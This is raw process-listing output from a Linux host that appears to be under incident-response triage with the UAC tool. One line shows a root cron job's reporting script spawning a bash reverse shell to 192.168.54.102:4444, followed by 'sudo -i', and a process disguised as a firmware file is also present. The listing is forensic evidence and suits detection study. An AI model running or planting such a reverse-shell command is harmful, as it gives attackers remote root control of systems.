0 S root        4783    4782  0  80   0 -  1981 do_sel 12:45 ?        00:00:00 bash -i
1 I root        5412       2  0  60 -20 -     0 rescue 12:48 ?        00:00:00 [kworker/R-ib-comp-wq]
1 I root        5414       2  0  60 -20 -     0 rescue 12:48 ?        00:00:00 [kworker/R-ib-comp-unb-wq]
1 I root        5415       2  0  60 -20 -     0 rescue 12:48 ?        00:00:00 [kworker/R-ib_mcast]
1 I root        5416       2  0  60 -20 -     0 rescue 12:48 ?        00:00:00 [kworker/R-ib_nl_sa_wq]
1 I root        5544       2  0  60 -20 -     0 worker 13:01 ?        00:00:00 [kworker/1:0H]
1 I root        5792       2  0  80   0 -     0 worker 13:13 ?        00:00:00 [kworker/u9:4-flush-8:0]
5 S root        5844     743  0  80   0 -  2464 do_wai 13:20 ?        00:00:00 /usr/sbin/CRON -f -L 0
4 S root        5845    5844  0  80   0 -   700 do_wai 13:20 ?        00:00:00 /bin/sh -c /opt/company/scripts/generate_reports.sh
0 S root        5846    5845  0  80   0 -  1836 do_wai 13:20 ?        00:00:00 /bin/bash /opt/company/scripts/generate_reports.sh
0 S root        5861    5846  0  80   0 -  1836 do_wai 13:20 ?        00:00:00 bash -c bash -i >& /dev/tcp/192.168.54.102/4444 0>&1
0 S root        5862    5861  0  80   0 -  1981 do_wai 13:20 ?        00:00:00 bash -i
4 S root        5869    5862  0  80   0 -  4288 do_pol 13:20 ?        00:00:00 sudo -i
4 S root        5877       1  0  80   0 -  5181 ep_pol 13:20 ?        00:00:00 /usr/lib/systemd/systemd --user
5 S root        5879    5877  0  80   0 -  5367 do_sig 13:20 ?        00:00:00 (sd-pam)
1 S root        5884       2  0  58   - -     0 psi_rt 13:20 ?        00:00:00 [psimon]
4 S root        5891    5877  0  80   0 -  9784 do_wai 13:20 ?        00:00:00 /snap/snapd-desktop-integration/315/usr/bin/snapd-desktop-integration
4 S root        5893    5869  0  80   0 -  1901 wait_w 13:20 ?        00:00:00 -bash
4 S root        5925    5877  0  80   0 -  2363 ep_pol 13:20 ?        00:00:00 /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
4 S root        5926    5877  0  80   0 - 133332 do_pol 13:20 ?       00:00:00 /usr/libexec/xdg-document-portal
4 S root        5930    5877  0  80   0 - 76732 do_pol 13:20 ?        00:00:00 /usr/libexec/xdg-permission-store
4 S root        5937    5926  0  80   0 -   676 unix_s 13:20 ?        00:00:00 fusermount3 -o rw,nosuid,nodev,fsname=portal,auto_unmount,subtype=portal -- /run/user/0/doc
1 S root        6052    5891  0  80   0 - 88202 do_pol 13:20 ?        00:00:00 /snap/snapd-desktop-integration/315/usr/bin/snapd-desktop-integration
1 I root        6057       2  0  80   0 -     0 worker 13:20 ?        00:00:00 [kworker/u9:3-writeback]
1 I root        6091       2  0  80   0 -     0 worker 13:24 ?        00:00:00 [kworker/u10:3-events_power_efficient]
1 I root        6275       2  0  80   0 -     0 worker 13:34 ?        00:00:00 [kworker/u10:2-events_power_efficient]
1 S root        6454       2  0  58   - -     0 psi_rt 13:34 ?        00:00:00 [psimon]
4 S root        6465       1  0  80   0 - 181061 futex_ 13:34 ?       00:00:00 /usr/lib/firmware/iwlwifi-5000-5.ucode
0 S mark        6666    2065  0  80   0 - 738752 do_pol 13:44 ?       00:00:00 gjs /usr/share/gnome-shell/extensions/ding@rastersoft.com/app/ding.js -E -P /usr/share/gnome-shell/extensions/ding@rastersoft.com/app
1 I root        6729       2  0  60 -20 -     0 worker 13:45 ?        00:00:00 [kworker/0:2H]
1 I root        6928       2  0  80   0 -     0 worker 13:47 ?        00:00:01 [kworker/0:0-events]
0 S mark        7005    2757  0  80   0 -  2167 do_sel 13:48 pts/1    00:00:00 bash
0 S mark        7035    2757  0  80   0 -  2167 do_sel 13:49 pts/2    00:00:00 bash
1 I root        7182       2  0  80   0 -     0 worker 13:55 ?        00:00:00 [kworker/u9:2-writeback]
1 I root        7196       2  0  80   0 -     0 worker 13:56 ?        00:00:00 [kworker/u10:1-events_unbound]
1 I root        7210       2  0  80   0 -     0 worker 13:57 ?        00:00:00 [kworker/0:1-cgroup_destroy]
1 I root        9204       2  0  80   0 -     0 worker 14:00 ?        00:00:00 [kworker/1:1]
1 I root       11225       2  0  80   0 -     0 worker 14:04 ?        00:00:00 [kworker/u10:0-events_power_efficient]
1 I root       11413       2  0  80   0 -     0 worker 14:05 ?        00:00:00 [kworker/u9:0-flush-8:0]
0 S mark       11462    2757  0  80   0 -  2167 do_wai 14:05 pts/3    00:00:00 bash
1 I root       11470       2  0  80   0 -     0 worker 14:06 ?        00:00:00 [kworker/u9:1-flush-8:0]
1 I root       11483       2  0  80   0 -     0 worker 14:07 ?        00:00:00 [kworker/0:2]
4 S root       11700   11462  0  80   0 -  4304 do_pol 14:07 pts/3    00:00:00 sudo ./uac -p ir_triage /tmp
1 S root       11701   11700  0  80   0 -  4304 do_pol 14:07 pts/4    00:00:00 sudo ./uac -p ir_triage /tmp
4 S root       11702   11701  1  80   0 -   834 do_wai 14:07 pts/4    00:00:00 /bin/sh ./uac -p ir_triage /tmp
1 S root       13171   11702  4  80   0 -   834 do_wai 14:07 pts/4    00:00:00 /bin/sh ./uac -p ir_triage /tmp
4 R root       13385   13171  0  80   0 -  2084 -      14:07 pts/4    00:00:00 ps -efl
